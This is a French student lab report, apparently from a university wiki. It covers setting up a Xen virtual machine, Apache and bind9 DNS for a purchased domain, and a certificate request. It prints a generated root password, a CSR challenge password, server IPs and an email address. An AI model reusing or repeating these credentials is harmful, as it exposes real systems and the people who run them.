*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Paquetages nécessaires pour RAID5 ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
